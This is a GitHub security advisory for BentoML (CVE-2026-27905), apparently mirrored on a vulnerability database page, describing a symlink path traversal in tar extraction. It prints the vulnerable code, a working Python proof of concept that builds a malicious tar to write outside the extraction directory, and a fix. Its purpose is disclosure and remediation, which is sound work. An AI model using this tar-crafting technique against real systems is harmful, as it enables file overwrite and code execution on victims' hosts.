GHSA-M6W7-QV66-G3MF

Vulnerability from github – Published: 2026-03-03 17:46 – Updated: 2026-03-04 02:00
VLAI?
Summary
BentoML Vulnerable to Arbitrary File Write via Symlink Path Traversal in Tar Extraction
Details

Arbitrary File Write via Symlink Path Traversal in Tar Extraction

Summary

The safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.

Affected Component

  • File: src/bentoml/_internal/utils/filesystem.py:58-96
  • Callers: src/bentoml/_internal/cloud/bento.py:542, src/bentoml/_internal/cloud/model.py:504
  • Affected versions: All versions with safe_extract_tarfile()

Severity

CVSS 3.1: 8.1 (High) AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Vulnerability Details

Vulnerable Code (filesystem.py:58-96)

def safe_extract_tarfile(tar, destination):
    os.makedirs(destination, exist_ok=True)
    for member in tar.getmembers():
        fn = member.name
        path = os.path.abspath(os.path.join(destination, fn))
        if not Path(path).is_relative_to(destination):  # Line 64: INCOMPLETE
            continue  # Only checks member path, NOT symlink target
        if member.issym():
            tar._extract_member(member, path)  # Line 75: Creates symlink with UNVALIDATED target
        else:
            fp = tar.extractfile(member)
            with open(path, "wb") as destfp:  # Line 92: open() FOLLOWS symlinks
                shutil.copyfileobj(fp, destfp)

The Bug

  1. Line 64: Path(path).is_relative_to(destination) checks the member's OWN path, not the symlink target
  2. Line 75: tar._extract_member() creates symlink with unvalidated target (e.g., /etc)
  3. Line 92: open(path, "wb") follows the symlink, writing OUTSIDE the destination

os.path.abspath() does NOT resolve symlinks (only . and ..). The path check passes because the string path appears within destination, but open() follows the symlink to the actual target.

Proof of Concept

import io, os, shutil, tarfile, tempfile
from pathlib import Path

def create_malicious_tar(target_dir, target_file, payload):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w:gz') as tar:
        sym = tarfile.TarInfo(name='escape')
        sym.type = tarfile.SYMTYPE
        sym.linkname = target_dir
        tar.addfile(sym)
        info = tarfile.TarInfo(name=f'escape/{target_file}')
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    buf.seek(0)
    return buf

with tempfile.TemporaryDirectory() as tmpdir:
    extract_dir = os.path.join(tmpdir, 'extract')
    target_dir = os.path.join(tmpdir, 'outside')
    os.makedirs(target_dir)

    mal_tar = create_malicious_tar(target_dir, 'pwned.txt', b'PWNED')
    tar = tarfile.open(fileobj=mal_tar, mode='r:gz')

    # Reproduce filesystem.py:58-96
    os.makedirs(extract_dir, exist_ok=True)
    for member in tar.getmembers():
        path = os.path.abspath(os.path.join(extract_dir, member.name))
        if not Path(path).is_relative_to(extract_dir): continue
        if member.issym():
            tar._extract_member(member, path)  # Symlink target NOT checked
        else:
            fp = tar.extractfile(member)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            if fp:
                with open(path, 'wb') as destfp:  # Follows symlink!
                    shutil.copyfileobj(fp, destfp)

    assert os.path.exists(os.path.join(target_dir, 'pwned.txt'))
    print(open(os.path.join(target_dir, 'pwned.txt')).read())  # PWNED

Impact

1. Arbitrary file overwrite via shared bentos

BentoML users share pre-built bentos. A malicious bento can overwrite any writable file: ~/.bashrc, ~/.ssh/authorized_keys, crontabs, Python site-packages.

2. Remote code execution via file overwrite

Overwriting ~/.bashrc or Python packages achieves RCE.

3. BentoCloud deployments

safe_extract_tarfile() is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.

Remediation

Validate symlink targets:

if member.issym():
    target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))
    if not Path(target).is_relative_to(dest):
        logger.warning('Symlink %s points outside: %s', member.name, member.linkname)
        continue

Or use Python 3.12+ tar.extractall(filter='data').

References

  • CWE-59: Improper Link Resolution Before File Access ('Link Following')
  • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Severity ?
8.6 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.36"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T17:46:47Z",
    "nvd_published_at": "2026-03-03T23:15:55Z",
    "severity": "HIGH"
  },
  "details": "# Arbitrary File Write via Symlink Path Traversal in Tar Extraction\n\n## Summary\n\nThe `safe_extract_tarfile()` function validates that each tar member\u0027s path is within the destination directory, but for symlink members it only validates the symlink\u0027s own path, **not the symlink\u0027s target**. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.\n\n## Affected Component\n\n- **File**: `src/bentoml/_internal/utils/filesystem.py:58-96`\n- **Callers**: `src/bentoml/_internal/cloud/bento.py:542`, `src/bentoml/_internal/cloud/model.py:504`\n- **Affected versions**: All versions with `safe_extract_tarfile()`\n\n## Severity\n\n**CVSS 3.1: 8.1 (High)**\n`AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H`\n\n## Vulnerability Details\n\n### Vulnerable Code (filesystem.py:58-96)\n\n```python\ndef safe_extract_tarfile(tar, destination):\n    os.makedirs(destination, exist_ok=True)\n    for member in tar.getmembers():\n        fn = member.name\n        path = os.path.abspath(os.path.join(destination, fn))\n        if not Path(path).is_relative_to(destination):  # Line 64: INCOMPLETE\n            continue  # Only checks member path, NOT symlink target\n        if member.issym():\n            tar._extract_member(member, path)  # Line 75: Creates symlink with UNVALIDATED target\n        else:\n            fp = tar.extractfile(member)\n            with open(path, \"wb\") as destfp:  # Line 92: open() FOLLOWS symlinks\n                shutil.copyfileobj(fp, destfp)\n```\n\n### The Bug\n\n1. Line 64: `Path(path).is_relative_to(destination)` checks the member\u0027s OWN path, not the symlink target\n2. Line 75: `tar._extract_member()` creates symlink with unvalidated target (e.g., `/etc`)\n3. Line 92: `open(path, \"wb\")` follows the symlink, writing OUTSIDE the destination\n\n`os.path.abspath()` does NOT resolve symlinks (only `.` and `..`). The path check passes because the string path appears within destination, but `open()` follows the symlink to the actual target.\n\n## Proof of Concept\n\n```python\nimport io, os, shutil, tarfile, tempfile\nfrom pathlib import Path\n\ndef create_malicious_tar(target_dir, target_file, payload):\n    buf = io.BytesIO()\n    with tarfile.open(fileobj=buf, mode=\u0027w:gz\u0027) as tar:\n        sym = tarfile.TarInfo(name=\u0027escape\u0027)\n        sym.type = tarfile.SYMTYPE\n        sym.linkname = target_dir\n        tar.addfile(sym)\n        info = tarfile.TarInfo(name=f\u0027escape/{target_file}\u0027)\n        info.size = len(payload)\n        tar.addfile(info, io.BytesIO(payload))\n    buf.seek(0)\n    return buf\n\nwith tempfile.TemporaryDirectory() as tmpdir:\n    extract_dir = os.path.join(tmpdir, \u0027extract\u0027)\n    target_dir = os.path.join(tmpdir, \u0027outside\u0027)\n    os.makedirs(target_dir)\n    \n    mal_tar = create_malicious_tar(target_dir, \u0027pwned.txt\u0027, b\u0027PWNED\u0027)\n    tar = tarfile.open(fileobj=mal_tar, mode=\u0027r:gz\u0027)\n    \n    # Reproduce filesystem.py:58-96\n    os.makedirs(extract_dir, exist_ok=True)\n    for member in tar.getmembers():\n        path = os.path.abspath(os.path.join(extract_dir, member.name))\n        if not Path(path).is_relative_to(extract_dir): continue\n        if member.issym():\n            tar._extract_member(member, path)  # Symlink target NOT checked\n        else:\n            fp = tar.extractfile(member)\n            os.makedirs(os.path.dirname(path), exist_ok=True)\n            if fp:\n                with open(path, \u0027wb\u0027) as destfp:  # Follows symlink!\n                    shutil.copyfileobj(fp, destfp)\n    \n    assert os.path.exists(os.path.join(target_dir, \u0027pwned.txt\u0027))\n    print(open(os.path.join(target_dir, \u0027pwned.txt\u0027)).read())  # PWNED\n```\n\n## Impact\n\n### 1. Arbitrary file overwrite via shared bentos\nBentoML users share pre-built bentos. A malicious bento can overwrite any writable file: `~/.bashrc`, `~/.ssh/authorized_keys`, crontabs, Python site-packages.\n\n### 2. Remote code execution via file overwrite\nOverwriting `~/.bashrc` or Python packages achieves RCE.\n\n### 3. BentoCloud deployments\n`safe_extract_tarfile()` is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.\n\n## Remediation\n\nValidate symlink targets:\n```python\nif member.issym():\n    target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))\n    if not Path(target).is_relative_to(dest):\n        logger.warning(\u0027Symlink %s points outside: %s\u0027, member.name, member.linkname)\n        continue\n```\n\nOr use Python 3.12+ `tar.extractall(filter=\u0027data\u0027)`.\n\n## References\n\n- CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
  "id": "GHSA-m6w7-qv66-g3mf",
  "modified": "2026-03-04T02:00:42Z",
  "published": "2026-03-03T17:46:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "BentoML Vulnerable to Arbitrary File Write via Symlink Path Traversal in Tar Extraction"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.